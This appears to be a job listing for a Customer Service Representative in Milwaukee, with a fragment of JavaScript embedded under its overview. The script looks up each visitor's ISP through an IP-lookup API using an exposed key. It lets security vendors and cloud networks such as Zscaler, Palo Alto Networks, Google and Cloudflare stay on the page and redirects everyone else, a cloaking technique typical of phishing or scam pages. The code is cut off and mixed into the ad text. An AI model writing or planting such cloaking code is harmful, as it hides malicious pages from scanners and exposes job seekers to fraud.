Customer Service Representative
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Customer Service Representative in Milwaukee, Wisconsin, to deliver exceptional support to our clients.
Responsibilities include:
- Responding to customer inquiries via phone, email, and chat in a timely and professional manner.
- Resolving customer issues, providing product information, and ensuring customer satisfaction.
- Documenting interactions accurately in the CRM system.
- Assisting with order processing, returns, and billing inquiries.
- Collaborating with team members to improve service quality and processes.
Skills needed:
- Excellent communication and interpersonal skills.
- Strong problem-solving abilities.
- Ability to multitask and manage time effectively.
- Customer-focused attitude and adaptability.
- Basic computer proficiency and data entry skills.
Benefits include competitive pay, health insurance options, paid time off, retirement plans, and ongoing training opportunities. Join our team and help us deliver outstanding service to our valued customers.